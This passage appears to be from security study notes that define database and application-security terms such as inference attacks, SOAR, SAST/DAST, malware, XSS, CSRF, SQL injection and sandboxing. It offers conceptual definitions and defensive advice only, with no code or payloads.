and classes that developers can use to build applications within a specific
programming language or framework.
 Operating System APIs: These APIs allow applications to interact
with the underlying operating system, accessing features like file I/O,
hardware control, and system resources.
5. API Requests and Responses: APIs involve making requests and receiving
responses. The request typically includes information such as the desired action
and any required parameters, while the response contains the requested data or
confirmation of the action.
6. Authentication and Authorization: Many APIs require authentication to
ensure that only authorized users or applications can access their resource This is
often done using API keys, tokens, or other auth mechanisms.
To make you clear with the diagram of what is an API, let’s take a real-life
example of an API, you can think of an API like a waiter in a restaurant who
listens to your order request, goes to the chef, takes the food items ordered and
gets back to you with the order.
METADATA
Metadata is information that provides context and attributes about other data. It
helps describe, organize, and manage data, making it more accessible and
understandable. Metadata can include details such as titles, authors, creation
dates, file formats, and data sources. It is used for data discovery, data
integration, data preservation, and ensuring data quality. Metadata standards
help ensure consistency in describing and managing data across various domains
and industries.
OLAP (Online Analytics Processing)
OLAP, or Online Analytical Processing, is a technology and approach for data
analysis that enables users to interact with and analyze data in a
multidimensional way. It’s commonly used in business intelligence and data
warehousing to gain insights from large datasets
DATA MINING
Data mining is the process of discovering patterns, trends, insights, and
knowledge from large volumes of data. It involves the use of various techniques,
including statistical analysis, machine learning, and artificial intelligence, to
extract valuable information and uncover hidden relationships within datasets.
DB VULNERABILITIES AND THREAT ATTACK
Aggregation Attack:
An aggregation attack is a privacy violation or security breach in which an attacker
combines or aggregates information from multiple sources to deduce sensitive or
confidential data that would not be apparent from any single source. Aggregation
attacks exploit the practice of collecting and combining various pieces of
seemingly innocuous information to infer valuable or private details about
individuals, organizations, or systems.
Inference Attack:
An inference attack is a privacy breach in which an attacker deduces sensitive or
confidential information by analyzing seemingly innocuous or non-sensitive data.
Inference attacks are often used to extract private details by making educated
guesses or leveraging knowledge about the system’s behavior, access patterns, or
data relationships.

POLYINSTANTIATION & POLYMORPHISM


Polyinstantiation:
Polyinstantiation is a security mechanism used in secure database systems to
manage situations where multiple data items with different security classifications
are stored under the same identifier or key. It allows different security levels of
information to coexist within the same database.

Polymorphism:
Polymorphism is a programming concept, often used in object-oriented
programming (OOP), that allows objects or functions to take on multiple forms
based on context. It enhances code reusability and flexibility by enabling objects
of different types to be treated in a unified way. Polymorphism can be achieved
through method overloading (compile-time polymorphism) and method
overriding (runtime polymorphism).
LOCK CONTROL
Lock control is a key component of the ACID (Atomicity, Consistency, Isolation,
Durability) properties in database management systems. ACID is a set of
properties that guarantee reliable and consistent transaction processing in
databases. Lock control, often referred to as concurrency control, plays a crucial
role in ensuring that multiple transactions can be executed simultaneously
without interfering with each other.
OLTP (Online Transaction Processing)
Online Transaction Processing (OLTP) is a type of data processing system that
focuses on managing and facilitating transaction-oriented tasks in real-time.
OLTP systems are designed to efficiently and accurately handle a high volume of
small, individual transactions, such as recording sales, processing customer
orders, and updating inventory
SOAR (Security Orchestration, Automation & Response)
Security Orchestration, Automation, and Response (SOAR) is a comprehensive
cybersecurity technology and approach designed to improve the efficiency and
effectiveness of an organization’s security operations. SOAR platforms and
practices combine orchestration and automation to streamline incident response,
threat detection, and security operations while enabling better coordination and
collaboration among security teams.
SOURCE CODE MANAGEMENT (E.g. GitHub)
Source Code Management (SCM), also known as Version Control or Version
Control System (VCS), is a software development practice and a set of tools that
enable developers to efficiently track, manage, and collaborate on changes to the
source code of a software project
SOFTWARE COMPOSITION ANALYSIS (SCA)
Software Composition Analysis (SCA) is a cybersecurity practice and a set of tools
used to identify and assess the components and dependencies within a software
application. The primary goal of SCA is to manage and mitigate security,
licensing, and compliance risks associated with the use of third-party or open-
source software components within a software project. SCA tools help
organizations gain a clear understanding of the software components used in their
applications, including libraries, frameworks, and other external dependencies.
PROTECTING SOURCE CODE
Protecting source code involves implementing security measures to safeguard the
intellectual property and sensitive information contained within the source code
of a software application. Source code is a valuable asset, and protecting it is
essential to prevent unauthorized access, disclosure, modification, or theft.
SOURCE CODE ANALYSIS TOOL
A Source Code Analysis Tool, also known as a Static Code Analysis Tool or Static
Application Security Testing (SAST) tool, is a software application or utility used
by developers, quality assurance teams, and security professionals to examine the
source code of a software application or program. The primary purpose of these
tools is to identify potential issues, vulnerabilities, coding errors, and security
flaws in the source code.
DAST and SAST
DAST (Dynamic Application Security Testing) and SAST (Static Application
Security Testing) are two different approaches to identifying and mitigating
security vulnerabilities in software applications. They operate at different stages
of the software development lifecycle and use distinct techniques.
VIRUS

A malicious program (software) is executed to replicate, make modifications to


other system features, and enter its own code. Its replication can impact various
features of a computer system, and then the system will become a “Compromised
Device.” Due to such impact, things as the below happen.
1. Slow System Performance,
2. Data Loss, and
3. System Crashes.

Defenses against Virus include:


a) Daily software update
b) An antivirus Program must be installed on all devices.
c) Avoid phishing emails and other social engineering tactics
TYPES OF VIRUS
R/W = Ransomeware
Malware
Malware is malicious software deployed by a threat actor to wreak havoc on an
organization or individual. Malware is usually found attached to emails,
embedded in fraudulent links, hidden in ads, or lying in-wait on various sites that
you (or your employees) might visit on the internet. The end goal of malware is to
harm or exploit computers and networks, often to steal data or money.

Defenses against malware include:


a) Employing Monitoring and Detection Tools
b) Utilizing Security Awareness Training
c) Have a Vulnerability Management Program
d) Implement a Zero Trust Framework
CROSS SITE SCRIPTING
Cross-site scripting (XSS) is a type of cyber attack where an attacker injects
malicious code into a website, allowing them to steal sensitive data or take control
of the site.
XSS attacks can be performed through various means, including faulty user input
validation, unintentional JavaScript execution, and exploitation of vulnerabilities
in web applications. It is important for website administrators to implement
security measures, such as input validation and obfuscation, to protect against
XSS attacks.
How does XSS work?
Cross-site scripting works by manipulating a vulnerable web site so that it returns
malicious JavaScript to users. When the malicious code executes inside a victim’s
browser, the attacker can fully compromise their interaction with the application.
CROSS SITE REQUEST FORGERY (CSRF)
Cross-Site Request Forgery (CSRF) is a type of security vulnerability or attack that
occurs when an attacker tricks a user into unintentionally performing actions on a
website or web application without the user’s consent. CSRF attacks are often
carried out through malicious links or scripts that exploit the trust a user has with
a particular website.
Here’s a more detailed explanation of CSRF:
1. Basic Concept: In a CSRF attack, an attacker tricks a user into
executing an unwanted action on a website where the user is already
authenticated. The user might be completely unaware that the action is
taking place.
2. How It Works: The attacker crafts a malicious URL or embeds
malicious code on a website. This URL or code, when triggered, makes
the victim’s browser send a request to a different website (usually the
target website) that the user is already authenticated with. Since the
browser sends the request with the user’s credentials, the target website
mistakenly believes that the request is legitimate.
3. Example: Let’s say a user is logged into their online banking account. If
the attacker tricks them into clicking a link or image on a malicious
website, and this link sends a request to transfer money to the attacker’s
account on the banking site, the user’s browser will carry out the request
because it’s already authenticated with the banking site.
4. Security Impact: CSRF attacks can have serious consequences, as they
can lead to unauthorized actions being performed on behalf of the user.
These actions could include changing passwords, making financial
transactions, modifying data, or more, depending on the functionality
exposed by the vulnerable website.
5. Mitigation: Web developers and application owners need to implement
proper security measures to prevent CSRF attacks. This includes using
secure coding practices, validating requests, and implementing anti-
CSRF mechanisms.
Difference Between XSS and CSRF
The key difference between XSS and CSRF is that, in XSS (or Cross Site
Scripting), the site accepts the malicious code while, in CSRF (or Cross
Site Request Forgery), the malicious code is stored in the third party
sites. The XSS is a type of computer security vulnerability in web applications
that enables attackers to inject client-side scripts into web pages viewed by other
users. On the other hand, CSRF is a type of malicious activity of a hacker or a
website that transmits unauthorized commands that the user’s web application
will trust.
Summary — XSS vs CSRF
XSS and CSRF are two types of attacks to a website. XSS stands for Cross Site
Scripting while CSRF stands for Cross Site Request Forgery. The difference
between XSS and CSRF is that, in XSS, the site accepts the malicious code while,
in CSRF, the malicious code is stored in the third party sites.
SQL INJECTION
SQL injection is a security threat where an attacker injects malicious SQL code
into a web application’s database queries, allowing them to access sensitive data,
modify or delete data, or execute unauthorized actions. It occurs when user input
is not properly sanitized or validated, enabling an attacker to exploit
vulnerabilities in the application.
To protect against SQL injection, use parameterized queries, input validation, and
limit privileges to the database.
CODE SIGN
Code signing is a security practice used in software development to verify the
authenticity and integrity of software or code. It involves digitally signing code or
executable files with a cryptographic signature, typically using a private key. This
signature can then be verified using the corresponding public key to ensure that
the code hasn’t been tampered with and that it comes from a trusted source.
SANDBOX
A sandbox is a secure testing environment used to develop and test software,
websites, or applications without affecting the main production environment. It
allows developers to experiment, test new ideas, and work on projects without
risking any data breaches or system failures. Sandboxes are often used in software
development, QA testing, and web development.
Key characteristics of a sandbox include:
1. Isolation: Sandboxes keep untrusted code separate from the rest of the
system to prevent interference and damage.
2. Security: They create a safe environment for running unverified code,
enhancing system security.
3. Control: Sandboxes are governed by rules and policies dictating
resource access and actions.
4. Testing and Analysis: Developers use them to assess software for
vulnerabilities and malware.
5. Web Browsing: Browsers use sandboxes to isolate web pages, ensuring
one doesn’t affect others.
6. Malware Protection: Antivirus software uses sandboxes to safely
examine suspicious files.
7. Virtualization: Virtual machines and containers offer sandboxing
through encapsulation.

You might also like